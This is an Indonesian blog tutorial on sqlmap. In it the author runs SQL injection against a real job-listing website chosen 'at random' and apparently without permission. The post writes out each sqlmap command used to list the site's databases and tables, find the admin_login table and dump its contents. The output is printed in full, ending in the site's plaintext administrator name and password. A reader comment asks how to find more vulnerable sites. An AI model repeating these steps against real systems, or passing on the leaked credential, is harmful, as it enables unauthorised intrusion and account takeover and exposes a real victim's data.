468x60 ads

Thursday, 4 April 2013

bagaimana cara menggunakan sqlmap

Tutorial sqlmap

Kali ini saya ingin bahas tentang penggunaan dasar salah satu SQL Injection tools dari platform linux. Sistem operasi yang saya gunakan yaitu Backtrack 5 R1 turunan dari ubuntu 10.04. Saya ingin bahas tentang sqlmap. Sedikit pengertian tentang sqlmap menurut saya, sqlmap yaitu salah satu tool untuk melakukan penetrasi pada suatu website dengan teknik SQL Injection. Tool ini bersifat free, mungkin pengguna windows sudah kenal dengan havij, sama fungsinya seperti havij bedanya tool ini jalan di console sedangkan havij dengan GUI nya yang tinggal klak-klik saja untuk melakukan penetrasi.
Tulisan ini dibuat dengan tujuan pembelajaran, gunakan dengan pertanggung jawaban sendiri. Ok, saya akan coba melakukan penetrasi secara acak, dan saya dapat target http://www.yourparttime.com/ dengan vulnerability di http://www.yourparttime.com/view-jobinfo.php?id=2097′
catatan:
1 --threads : max number sqlmap untuk membuka concurrent dari koneksi http
2 --random-agent : load random user agent dari default sqlmap,
Untuk penggunaan standar nya
root@goldsploit#~:~/sqlmap-dev# ./sqlmap.py -u "URL" --random-agent --threads X --banner --dbs --tables --columns --dump –dumpall
Pertama kita akan memfatach banner mysql
1
root@goldsploit#~:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 --banner
fatch ini berfungsi untuk mendapatkan route dari web target sehingga akan lebih mudah sqlmap untuk mengeksplorasi. Lalu saya akan analisis fatch tersebut dengan perintah
1
root@goldsploit#~:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 --current-user -currrent-db
Selanjutnya saya akan memfatch user dan db yang digunakan dengan flag
1
root@goldsploit#~:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 --dbs
didapat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
web server operating system: Linux Fedora 9 (Sulphur)
web application technology: PHP 5.2.6, Apache 2.2.8
back-end DBMS: MySQL 5.0
[17:13:12] [INFO] fetching database names
[17:13:12] [INFO] the SQL query used returns 4 entries
[17:13:12] [INFO] starting 4 threads
[17:13:13] [INFO] retrieved: ypt_v2
[17:13:13] [INFO] retrieved: test
[17:13:13] [INFO] retrieved: ypt_db
[17:13:13] [INFO] retrieved: information_schema
available databases [4]:
[*] information_schema
[*] test
[*] ypt_db
[*] ypt_v2
[17:13:13] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.yourparttime.com'
[*] shutting down at 17:13:13
Terlihat database yang digunakan target. Saya akan mengambil salah satu yaitu database ypt_v2. Sekarang kita eksplorasi table dari database ypt_v2
1
root@goldsploit#~:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 -D ypt_v2 --tables
dan saya mendapatkan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
Database: ypt_v2
 
[71 tables]
 
+-----------------------+
 
| a_email_alert |
 
| a_sms_alert |
 
| ad_setting |
 
| admin_login |
 
| admin_login_log |
 
| agent |
 
| agent_inquiry |
 
| agent_promo |
 
| aging |
 
| apply_job |
 
| article |
 
| book |
 
| cc_info |
 
| cc_post_process |
 
| cc_pre_process |
 
| company_industry |
 
| company_logo |
 
| company_view |
 
| credit_history |
 
| credit_manage |
 
| data_capture |
 
| data_employer |
 
| data_history |
 
| data_publisher |
 
| email_alert |
 
| email_alert_temp |
 
| employee |
 
| employee_rate |
 
| employer |
 
| employer_rate |
 
| footer_ad |
 
| jane_ads |
 
| jane_payout |
 
| jane_report |
 
| job_category |
 
| job_title |
 
| launch |
 
| launch_sponsor |
 
| matching_job |
 
| matching_log |
 
| meet |
 
| news |
 
| newsletter |
 
| newsletter_achieve |
 
| payment |
 
| payment_log |
 
| polling_1 |
 
| post_ad |
 
| post_job |
 
| post_job_bak |
 
| post_job_history |
 
| pr_form |
 
| promo_history |
 
| promotion |
 
| publishers |
 
| search_resume |
 
| search_resume_log |
 
| search_shortlist |
 
| search_shortlist_log |
 
| skm |
 
| spec_art |
 
| spec_education |
 
| spec_hotel |
 
| spec_hr |
 
| spec_it |
 
| spec_sale |
 
| spec_service |
 
| temporary_remark |
 
| top_banner |
 
| traceurl |
 
| track_referral_code |
 
+----------------------- +
 
[17:15:26] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.yourparttime.com'
 
[*] shutting down at 17:15:26
<pre>
wah ada 71 table yang kita dapat. Dan terlihat tabel admin_login disana. Saya langsung akan langsung cari kolom di admin_login
1
root@goldsploit#~:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 -D ypt_v2 -T admin_login --columns
dan saya dapatkan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
</pre>
web server operating system: Linux Fedora 9 (Sulphur)
 
web application technology: PHP 5.2.6, Apache 2.2.8
 
back-end DBMS: MySQL 5.0
 
[17:19:13] [INFO] fetching columns for table 'admin_login' on database 'ypt_v2'
 
[17:19:14] [INFO] the SQL query used returns 4 entries
 
[17:19:14] [INFO] starting 4 threads
 
[17:19:14] [INFO] retrieved: admin_password
 
[17:19:15] [INFO] retrieved: admin_userid
 
[17:19:15] [INFO] retrieved: admin_name
 
[17:19:15] [INFO] retrieved: admin_id
 
[17:19:15] [INFO] retrieved: varchar(200)
 
[17:19:15] [INFO] retrieved: varchar(200)
 
[17:19:15] [INFO] retrieved: int(11)
 
[17:19:15] [INFO] retrieved: varchar(200)
 
Database: ypt_v2
 
Table: admin_login
 
[4 columns]
 
+--------------------+----------------+
 
| Column | Type |
 
+------------------- +----------------+
 
| admin_id | int(11) |
 
| admin_name | varchar(200) |
 
| admin_password | varchar(200) |
 
| admin_userid | varchar(200) |
 
+--------------------+----------------+
 
[17:19:16] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.yourparttime.com'
 
[*] shutting down at 17:19:16
<pre>
wah saya mendapatkan admin_id, admin_name, admin_password, dan admin_password. Ok lanjut dapatkan data dari admin_name dan admin_password saja karena yang lainnya tidak kita butuhkan.
1
2
</pre>
root@goldsploit#~:/pentest/database/sqlmap$ ./sqlmap.py -u "http://www.yourparttime.com/view-jobinfo.php?id=2097" --random-agent --threads 10 -D ypt_v2 -T admin_login -C admin_name,admin_password –dump
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
</pre>
web server operating system: Linux Fedora 9 (Sulphur)
 
web application technology: PHP 5.2.6, Apache 2.2.8
 
back-end DBMS: MySQL 5.0
 
do you want sqlmap to consider provided column(s):
 
[1] as LIKE column names (default)
 
[2] as exact column names
 
> 1
 
[17:22:30] [INFO] fetching columns LIKE 'admin_name, admin_password' for table 'admin_login' on database 'ypt_v2'
 
[17:23:01] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
 
[17:23:01] [WARNING] if the problem persists please try to lower the number of used threads (--threads)
 
[17:23:19] [INFO] the SQL query used returns 2 entries
 
[17:23:19] [INFO] starting 2 threads
 
[17:23:21] [INFO] retrieved: admin_name
 
[17:23:21] [INFO] retrieved: admin_password
 
[17:23:21] [INFO] retrieved: varchar(200)
 
[17:23:21] [INFO] retrieved: varchar(200)
 
[17:23:22] [INFO] fetching column(s) 'admin_name, admin_password' entries for table 'admin_login' on database 'ypt_v2'
 
[17:23:23] [INFO] the SQL query used returns 1 entries
 
[17:23:23] [INFO] retrieved: Administrator
 
[17:23:23] [INFO] retrieved: ypt01234
 
Database: ypt_v2
 
Table: admin_login
 
[1 entry]
 
+-----------------+---------------------+
 
| admin_name | admin_password    |
 
+-----------------+---------------------+
 
| Administrator | ypt01234 |
 
+-----------------+---------------------+
<pre>
binggoooo kita dapat. Dan passwordnya tidak terenkripsi, beruntungnya.
Sekian tutorial dasar sqlmap, semoga bermanfaat.

3 comments:

cara mencari web yang ada kelemahaannya , gimana caranya???

Post a Comment

Twitter Delicious Facebook Digg Stumbleupon Favorites More